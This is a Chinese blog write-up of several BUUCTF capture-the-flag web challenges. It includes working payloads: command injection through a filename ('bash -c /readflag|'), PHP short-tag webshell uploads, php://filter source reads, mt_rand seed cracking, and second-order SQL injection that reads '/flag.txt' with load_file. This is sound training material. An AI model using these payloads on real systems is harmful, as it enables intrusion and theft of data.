buuctf web题

buuctf web题

[HITCON 2017]SSRFme

首先理清代码逻辑。
上边一部分是输出输出了一下$_SERVER[“REMOTE_ADDR”],然后以
sandbox/" . md5(“orange” . $_SERVER[“REMOTE_ADDR”])为路径创建目录。
之后就是将当前目录转到了创建的目录下。
目录可以直接计算出来,先计算一下目录。

<?php
$a = "sandbox/" . md5("orange127.0.0.1");//127.0.0.1是示例
echo $a;//创造的目录

shell_exec函数比较熟悉不用看,去看一下pathinfo。

在这里插入图片描述

在这里插入图片描述

过滤了点,防止了目录遍历,之后是file_put_contents写入文件。
先随便尝试一下。
?url=/&filename=feng
然后访问/sandbox/xxx/feng(xxx为自己脚本跑出的路径)
在这里插入图片描述

但直接去得到/flag的内容时无法成功,然后访问/readflag下载下来是一个乱码文件,应该是需要去执行readflag文件。
shell_exec函数支持file协议; 可以利用base -c "cmd"进行命令执行,先创建文件bash -c /readflag|。

?url=&filename=bash -c /readflag|

然后通过伪协议将读取flag再放入其他文件里。

?url=file:bash -c /readflag|&filename=feng

然后/sandbox/xxx/feng即可得到flag。

[watevrCTF-2019]Cookie Store

打开后发现flag需要用钱买,有题目可知,肯定是Cookie里存在钱的信息,看一下。

在这里插入图片描述

发现money直接明文储存在cookie里,并且买过东西的返回值也在cookie中,修改money买flag。
在这里插入图片描述

然后base64解码cookie,flag就在cookie里。
在这里插入图片描述

[红明谷CTF 2021]write_shell

还是简单的代码审计。
代码思路很容易理解,传入action时,输出创建的目录,然后如果是upload时,便会在该目录中写入一个index.php文件,然后对data进行了过滤。
<和=都没有被过滤,直接利用段标签绕过即可。
先访问

?action=pwd

然后便会看到创建的目录,之后我们再写入木马文件。
?action=upload&data=<?=`ls%09/`?>
访问目录。

在这里插入图片描述

?action=upload&data=<?=`cat%09/f*`?>

然后再访问即可得到flag。

[b01lers2020]Welcome to Earth

一顿乱找,再/fight提示的/static/js/fight.js文件里找到了flag信息。

// Run to scramble original flag
//console.log(scramble(flag, action));
function scramble(flag, key) {
  for (var i = 0; i < key.length; i++) {
    let n = key.charCodeAt(i) % flag.length;
    let temp = flag[i];
    flag[i] = flag[n];
    flag[n] = temp;
  }
  return flag;
}
function check_action() {
  var action = document.getElementById("action").value;
  var flag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"];
  // TODO: unscramble function
}

写个排列脚本即可。(直接自己用眼看也可)

from itertools import permutations
flag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"]
item = permutations(flag)
for i in item:
	k = ''.join(list(i))
	if k.startswith('pctf{hey_boys') and k[-1] == '}':
		print(k)

在这里插入图片描述

不能理解这题有什么意思。

[GWCTF 2019]枯燥的抽奖

发现了check.php文件,发现是mt_rand生成的随机数,但存在漏洞。
mt_rand生成的是伪随机数:
所谓伪随机数,可以理解为可预测性的,生成伪随机数是线性的,例如:mt_rand()这个函数,如果知道他的分发seed种子,然后种子有了后,靠mt_rand()生成随机数。
我们知道了随机数的前十个,可与利用php_mt_seed*(PHP mt_rand()种子破解程序)工具来破解随机数。
下载网址:

php_mt_seed*下载地址

先用脚本将伪随机数转换成php_mt_seed可以识别的数据

str1 = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
str2 = 'liG57uc3Ls'
str3 = str1[::-1]
res = ''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
            break
print(res)

然后安装工具进行爆破。

在这里插入图片描述

然后破解出来了随机数,记得php版本,需要7.1以上的。

然后用脚本来得到需要的字符串。

<?php
mt_srand(627353629);//爆破出来的随机数
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){
    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);       
}
echo "<p id='p1'>".$str."</p>";

输入即可得到flag。

[NCTF2019]True XML cookbook

题目直接给了提示xml,发现登录框,找了个payload试了一下。

在这里插入图片描述

发现成功了,但是没有flag文件,常用的文件名都试过了,不行。
然后还差看了/etc/gpsts文件,但没发现什么。
在网上看到wp发现都是在/proc/net/arp,发现了内网信息。
然后就访问了内网。改了一下c字段。(但一直都没实现成功,先放到这吧)

[CISCN2019 华北赛区 Day1 Web5]CyberPunk

在源码中发现了任意文件读取漏洞。

在这里插入图片描述

payload:

?file=php://filter/convert.base64-encode/resource=index.php

顺便把search.php、change.php、delete.php都读出来。
一个一个都看了一下,看着就像是sql注入,本来还以为是绕过,但发现过滤了很多,绕不过去,但在change.php中发现。

$address = addslashes($_POST["address"]);

address仅用了addslashes过滤,连正则都没用,那肯定是这里的问题。
发现只有信息报错的时候才会被打印出来,所以猜测是二次注入中的报错注入。
先用常规payload试一下,闭合前边然后修改user_id的内容,在闭合后边。

1'where user_id=extractvalue(1,concat(0x7e,(select user()),0x7e));#

在这里插入图片描述

找了好久都没有找到flag,无语。
在网上看到可以利用load_file来直接读取文件,但是flag.txt文件是直接猜出来的吗?
payload:

1'where user_id=extractvalue(1,concat(0x7e,(select (load_file('/flag.txt'))),0x7e));#

在这里插入图片描述

有长度限制,用substring输出后边的即可。
payload:

1'where user_id=extractvalue(1,concat(0x7e,(select substring(load_file('/flag.txt'),25,50)),0x7e));#

在这里插入图片描述

看到还有大佬,直接改address的数据。
payload:

',address=(select load_file('/flag.txt'));#

原理也挺简单,利用change.php中插入时,修改了address的值。
然后查询即可得到flag。

在这里插入图片描述

                       

点击阅读全文

上一篇 2023年 5月 26日 am10:20
下一篇 2023年 5月 26日 am10:22